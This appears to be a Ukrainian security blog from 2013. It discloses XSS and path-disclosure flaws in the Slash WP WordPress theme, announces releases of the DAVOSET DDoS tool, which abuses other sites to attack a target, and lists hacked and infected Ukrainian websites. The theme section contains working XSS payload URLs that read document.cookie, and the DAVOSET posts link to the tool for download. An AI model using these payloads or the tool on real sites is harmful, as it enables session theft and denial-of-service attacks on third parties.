Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Spider Event Calendar, WordPress User Role Editor та WordPress Themes Book. Для котрих з’явилися експлоіти. Spider Event Calendar - це плагін для створення календаря, WordPress User Role Editor - це плагін для редагування ролей користувачів WP, WordPress Themes Book - це розробники тем для движка (зокрема наводиться уразливість в темі Flash Gamer).

• Spider Event Calendar 1.3.0 Cross Site Scripting / Path Disclosure / SQL Injection (деталі)
• WordPress User Role Editor 3.12 Cross Site Request Forgery (деталі)
• WordPress Themes Book Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Сьогодні вийшла нова версія програми DAVOSET v.1.0.7. В новій версії:

• Додав нові сервіси в обидва списки зомбі.
• Видалив непрацюючі адреси сервісів з обох списків.
• Зробив, щоб програма не закривалася при помилках з’єднання.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.0.7.rar.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.fabrika.gov.ua (хакером Sejeal) - 04.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://man.gov.ua (хакером Ali Hafez Wallace) - 25.04.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.uames.org.ua (хакером Hmei7) - 04.01.2013, зараз сайт вже виправлений адмінами
• http://yrin.com (хакером Hmei7) - 09.01.2013, зараз сайт вже виправлений адмінами
• http://isell.org.ua (хакером Ops507) - зараз сайт похаканий та інфікований

11.04.2013

У січні, 31.01.2013, я знайшов Full path disclosure, Cross-Site Scripting та Content Spoofing уразливості в темі Slash WP для WordPress. Про що найближчим часом повідомлю розробникам шаблону.

Раніше я вже писав про уразливості в темі Chocolate WP для WordPress від цих розробників.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.06.2013

Full path disclosure (WASC-13):

http://site/wp-content/themes/slash-wp/

FPD в index.php та інших php-файлах в папці плагіна та підпапках.

Cross-Site Scripting (WASC-08):

В темі використовується jPlayer 2.1.0 та JW Player 5.8.2011, про уразливості в яких я вже писав.

http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

На деяких сайтах з цією темою флешка JW Player є, на інших немає. Згідно з описом теми, JW Player підтримується темою, але не входить в стандартну поставку (лише jPlayer). Але його можна встановити окремо, що і роблять деякі власники сайтів.

Content Spoofing (WASC-12):

Про Content Spoofing уразливості та про інші XSS уразливості в JW Player та в jPlayer, ми можете прочитати у відповідних записах.

Уразливі всі версії теми Slash WP для WordPress.

Сьогодні вийшла нова версія програми DAVOSET v.1.0.6. В новій версії:

• Додав нові сервіси в list_full.txt.
• Покращив визначення сторінки при відправленні запитів.
• Виправив баг з ітератором $i при тестуванні списку.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

У версії 1.0.6 я додав list_full.txt, що окрім 20 сервісів з основного списку, має також 10 додаткових сервісів з AoF уразливостями.

Скачати: DAVOSET_v.1.0.6.rar.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://onika-tattoo.in.ua - інфекція була виявлена 12.06.2013. Зараз сайт входить до переліку підозрілих.
• http://ecopulse.org.ua - інфекція була виявлена 28.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://titrov.net - інфекція була виявлена 03.06.2013. Зараз сайт входить до переліку підозрілих.
• http://dosk.kiev.ua - інфекція була виявлена 06.06.2013. Зараз сайт не входить до переліку підозрілих.
• http://kovroline.com.ua - інфекція була виявлена 04.04.2013. Зараз сайт не входить до переліку підозрілих.

Розмістив на сайті DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення атак на інші сайти (зокрема DoS і DDoS атак). Мій інструмент стане в нагоді при тестуванні Abuse of Functionality уразливостей і для доведення Інтернет спільноті небезпеки цих дірок. Що я намагався робити в своїх статтях в 2010 році та в описах уразливостей (починаючи з 2007 року), коли звертав увагу на подібні уразливості.

У липні 2010 року я розробив першу версію DAVOSET, а 18.07.2010 випустив версію 1.0.5, яку сьогодні й розмістив на сайті. Це остання версія мого інструменту DAVOSET. Після того я вже не займався його розробкою. Але зараз я планую продовжити розробку програми і випустити нові версії.

Три роки я тримав цей інструмент приватно, але зараз публікую його у відкритий доступ. Щоб всі бажаючи могли протестувати Abuse of Functionality уразливості на численних сайтах.

Так як в більшості випадків власники сайтів та веб розробники ігнорують і не виправляють їх. Що може бути використано для DoS атак як на інші сайти, так і на самі сайти з AoF уразливостями, про що я писав у статті Використання сайтів для атак на інші сайти.

У версії 1.0.5 присутній список list.txt з 20 уразливими сервісами на різних сайтах (про які я писав в новинах). Також існує більший список уразливих сервісів, до якого увійшли сайти, про які я писав в новинах вже після виходу цієї версії DAVOSET, і який я планую оприлюднити в наступній версії програми.

Скачати: DAVOSET_v.1.0.5.rar.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах ProPlayer, Flagallery-Skins та Spider Catalog. Для котрих з’явилися експлоіти. ProPlayer - це медіа плеєр, Flagallery-Skins - це плагін з шаблонами галерей, Spider Catalog - це плагін для створення каталогу.

• WordPress ProPlayer Plugin SQL Injection (деталі)
• Wordpress Flagallery-Skins SQL Injection (деталі)
• Spider Catalog 1.4.6 Cross Site Scripting / Path Disclosure / SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://manadm.gov.ua (хакером Dz-BlaCk) - 14.04.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.turadm.gov.ua (хакером Dz-BlaCk) - 14.04.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://zapravka.lutsk.ua (хакером Hmei7) - 23.02.2013, зараз сайт вже виправлений адмінами
• http://pano-stairs.od.ua (хакерами HUNTER і Ayyildiz Tim)
• http://summitbiz.com.ua (хакером AnonGhost) - 05.06.2013, зараз сайт вже виправлений адмінами

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://kivadm.gov.ua - інфікований державний сайт - інфекція була виявлена 08.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://altamira.com.ua - інфекція була виявлена 06.06.2013. Зараз сайт входить до переліку підозрілих.
• http://qww.com.ua - інфекція була виявлена 09.06.2013. Зараз сайт не входить до переліку підозрілих.
• http://beezy.at.ua - інфекція була виявлена 09.06.2013. Зараз сайт входить до переліку підозрілих.
• http://global-katalog.com - інфекція була виявлена 11.06.2013. Зараз сайт не входить до переліку підозрілих.